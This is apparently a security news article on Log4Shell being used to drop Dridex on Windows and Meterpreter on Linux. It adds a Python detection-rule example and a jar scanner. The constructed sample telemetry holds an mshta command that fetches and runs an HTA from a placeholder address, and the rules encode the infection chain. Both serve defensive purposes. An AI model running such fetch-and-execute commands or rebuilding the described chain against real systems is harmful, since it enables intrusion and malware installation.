Threat actors are now exploiting the Log4Shell vulnerability in Apache Log4j to infect vulnerable devices with the notorious Dridex banking malware and with Meterpreter. Dridex is a banking trojan originally built to steal victims' online banking credentials, but over time it has evolved into a loader that downloads additional modules and carries out a range of malicious actions, such as installing further payloads, spreading to other devices, capturing screenshots, and more.
Dridex infections have also been linked to ransomware operations run by groups associated with the Evil Corp hacking gang, including BitPaymer, DoppelPaymer, and possibly other limited-use ransomware variants.
According to the cybersecurity firm Cryptolaemus, the Log4j flaw is now being used to infect Windows devices with the Dridex trojan and Linux devices with Meterpreter. Cryptolaemus member Joseph Roosen revealed that the threat actors use the RMI (Remote Method Invocation) variant of the Log4j exploit to force vulnerable devices to load and execute a Java class from an attacker-controlled remote server.
When the Java class runs, it attempts to download and launch an HTA file from one of several URLs, which installs the Dridex trojan. If the Windows commands fail, the class assumes the device is running Linux/Unix and instead downloads and runs a Python script that installs Meterpreter. Running Meterpreter on a Linux host gives the threat actors a remote shell, which they can use to deploy further payloads or execute commands. The Dridex operators are notorious for using racial and religious slurs in their file names and URLs.
On Windows, the Java class downloads and executes an HTA file, which creates a VBS file in the C:\ProgramData folder. This VBS script, already seen in earlier Dridex email campaigns, acts as the primary Dridex downloader. When run, it checks several environment variables to determine whether the user is a member of a Windows domain. If so, the script downloads the Dridex DLL and runs it with Rundll32.exe.
As noted above, if the initial Java class cannot run the Windows commands, it assumes the device is a Unix/Linux host and downloads an 'm.py' Python script instead. That script contains a base64-encoded script that is executed to install Meterpreter, a penetration-testing payload that gives the threat actors a reverse shell. With Meterpreter, the attackers can connect to the infected Linux server and run commands remotely to spread malware across the network, steal data, or encrypt it.
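The infection chain described in the two paragraphs above has a distinctive parent/child process shape on both platforms: a Java process spawning an HTA host, a script host running a .vbs from C:\ProgramData, that script host spawning rundll32.exe with a DLL, and on Linux a Java process running a Python script named m.py. The rules below are an added example written for this article, not a detection published by the researchers, and they run over constructed process-creation events. Two details are assumptions rather than facts from the report: that the HTA is launched through mshta.exe, and that the VBS runs under wscript.exe or cscript.exe; the file names loader.vbs, payload.dll and stage.hta and the address 198.51.100.7 are likewise made up for the sample data.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record (Sysmon event 1 / auditd execve style), constructed for this example."""
    host: str
    parent_image: str
    image: str
    cmdline: str


def basename(path: str) -> str:
    """Strip Windows or POSIX directories so rules match on the executable name only."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


# Each rule mirrors one link of the chain the article describes. mshta.exe as the HTA host
# and wscript.exe/cscript.exe as the VBS host are assumptions, not details from the report.
RULES = [
    # The exploited Log4j process (Java) launching an HTA.
    ("java_spawns_mshta", lambda e: basename(e.parent_image) == "java.exe"
        and basename(e.image) == "mshta.exe"),
    # The HTA's VBS dropper executed from C:\ProgramData.
    ("vbs_from_programdata", lambda e: basename(e.image) in ("wscript.exe", "cscript.exe")
        and re.search(r'c:\\programdata\\[^\s"]+\.vbs', e.cmdline, re.I) is not None),
    # The VBS downloader running the Dridex DLL through rundll32.exe.
    ("wscript_spawns_rundll32", lambda e: basename(e.parent_image) in ("wscript.exe", "cscript.exe")
        and basename(e.image) == "rundll32.exe" and ".dll" in e.cmdline.lower()),
    # Linux branch: the Java process running the downloaded m.py script.
    ("java_spawns_m_py", lambda e: basename(e.parent_image) == "java"
        and basename(e.image).startswith("python")
        and re.search(r"(^|[\s/])m\.py\b", e.cmdline) is not None),
]


def detect(events):
    """Return (rule, host, image) for every event matching a rule, in event order."""
    return [(name, e.host, basename(e.image))
            for e in events for name, rule in RULES if rule(e)]


# Constructed sample telemetry: a full Windows chain, a benign rundll32 launched by
# Explorer, the Linux chain, and the same m.py run from an interactive shell instead of Java.
SAMPLE_EVENTS = [
    ProcEvent("win01", r"C:\Program Files\Java\bin\java.exe", r"C:\Windows\System32\mshta.exe",
              "mshta.exe http://198.51.100.7/stage.hta"),
    ProcEvent("win01", r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\wscript.exe",
              r"wscript.exe C:\ProgramData\loader.vbs"),
    ProcEvent("win01", r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\ProgramData\payload.dll,#1"),
    ProcEvent("win01", r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe",
              "rundll32.exe shell32.dll,Control_RunDLL"),
    ProcEvent("lnx01", "/usr/bin/java", "/usr/bin/python3", "python3 ./m.py"),
    ProcEvent("lnx01", "/bin/bash", "/usr/bin/python3", "python3 ./m.py"),
]

if __name__ == "__main__":
    for rule, host, image in detect(SAMPLE_EVENTS):
        print(f"{host}: {rule} ({image})")
```

The parent-process conditions are what keep these rules quiet on a normal server: rundll32.exe and python3 are everyday binaries, and the two benign events in the sample show that neither fires unless the process was started by the link before it in the chain. Because Dridex's VBS only fetches the DLL for domain-joined users, the first two Windows rules may be all you see on a standalone host.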
With Log4Shell already being used to deploy a wide range of malware, it is no surprise that the more active malware operations are turning their attention to the vulnerability. Other malware operations are likely to use the flaw to breach servers and gain a foothold inside corporate networks. All organizations are therefore strongly advised to scan for vulnerable Log4j applications and upgrade them to the latest versions.
This means upgrading Log4j to the most recent version, 2.17.0, released on Saturday to address a new denial-of-service flaw. Many Log4j scanners are available for finding vulnerable applications, including a new local scanner from Profero security.
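To show what a local scanner of the kind mentioned above actually has to do, here is an added example written for this article (it is not Profero's scanner or any other published tool). It walks a directory tree, opens every .jar/.war/.ear/.zip, recurses into archives nested inside them (fat jars and WARs bundle their own copy of log4j-core), and classifies each log4j-core it finds: "patched" if the manifest version is at least the fixed release, "mitigated" if the JndiLookup class has been removed from the jar, otherwise "vulnerable". The 2.17.0 threshold is taken from this article's recommendation and is an assumption that later releases supersede; the jars the demo builds are stand-ins containing only a manifest and empty class entries, constructed so the example runs offline.

```python
import io
import os
import re
import tempfile
import zipfile

LOG4J_CORE_PREFIX = "org/apache/logging/log4j/core/"
JNDI_CLASS = LOG4J_CORE_PREFIX + "lookup/JndiLookup.class"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
FIXED = (2, 17, 0)  # assumption: the fixed release recommended above; newer releases supersede it


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); missing components are padded with 0."""
    nums = [int(n) for n in re.findall(r"\d+", text or "")][:3]
    return tuple(nums + [0] * (3 - len(nums)))


def manifest_version(zf):
    """Read Implementation-Version from META-INF/MANIFEST.MF, or None if absent."""
    try:
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    m = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.M)
    return m.group(1) if m else None


def assess_archive(zf, label):
    """Yield one finding per log4j-core found at `label` or nested inside it."""
    names = zf.namelist()
    if any(n.startswith(LOG4J_CORE_PREFIX) for n in names):
        version = manifest_version(zf)
        has_jndi = JNDI_CLASS in names
        if not has_jndi:
            verdict = "mitigated"      # JndiLookup class stripped from the jar
        elif version and parse_version(version) >= FIXED:
            verdict = "patched"
        else:
            verdict = "vulnerable"     # includes jars with no readable version
        yield {"path": label, "version": version, "jndi_lookup": has_jndi, "verdict": verdict}
    for n in names:  # recurse into nested archives
        if n.lower().endswith(ARCHIVE_EXT):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(n)))
            except zipfile.BadZipFile:
                continue
            yield from assess_archive(inner, f"{label}!{n}")


def scan_tree(root):
    """Scan every archive under `root` and return the list of findings."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, f)
                try:
                    with zipfile.ZipFile(path) as zf:
                        findings.extend(assess_archive(zf, path))
                except zipfile.BadZipFile:
                    continue
    return findings


def _fake_jar(version, with_jndi):
    """Constructed stand-in for a log4j-core jar: a manifest plus empty class entries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        zf.writestr(LOG4J_CORE_PREFIX + "Core.class", b"")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"")
    return buf.getvalue()


def build_demo_tree(root):
    """Populate `root` with constructed archives covering every verdict, including a nested one."""
    os.makedirs(os.path.join(root, "lib"), exist_ok=True)
    for name, version, jndi in [("log4j-core-2.14.1.jar", "2.14.1", True),
                                ("log4j-core-2.14.1-stripped.jar", "2.14.1", False),
                                ("log4j-core-2.17.0.jar", "2.17.0", True)]:
        with open(os.path.join(root, "lib", name), "wb") as f:
            f.write(_fake_jar(version, jndi))
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", _fake_jar("2.14.1", True))
        zf.writestr("WEB-INF/lib/other.jar", b"")  # corrupt nested entry the scanner must skip
    with open(os.path.join(root, "app.war"), "wb") as f:
        f.write(war.getvalue())


def demo():
    """Build the constructed tree in a temporary directory and return {relative path: verdict}."""
    with tempfile.TemporaryDirectory() as root:
        build_demo_tree(root)
        return {f["path"].replace(root + os.sep, "", 1): f["verdict"] for f in scan_tree(root)}


if __name__ == "__main__":
    for path, verdict in sorted(demo().items()):
        print(f"{verdict:10s} {path}")
```

Two points from the design are worth carrying over to whatever scanner you use: a copy of log4j-core inside a WAR or fat jar is as exploitable as one on the classpath, so any tool that does not open nested archives will miss it, and the JndiLookup check matters because a 2.x jar with that class deleted (the documented interim mitigation) is not vulnerable even though its version string says it is.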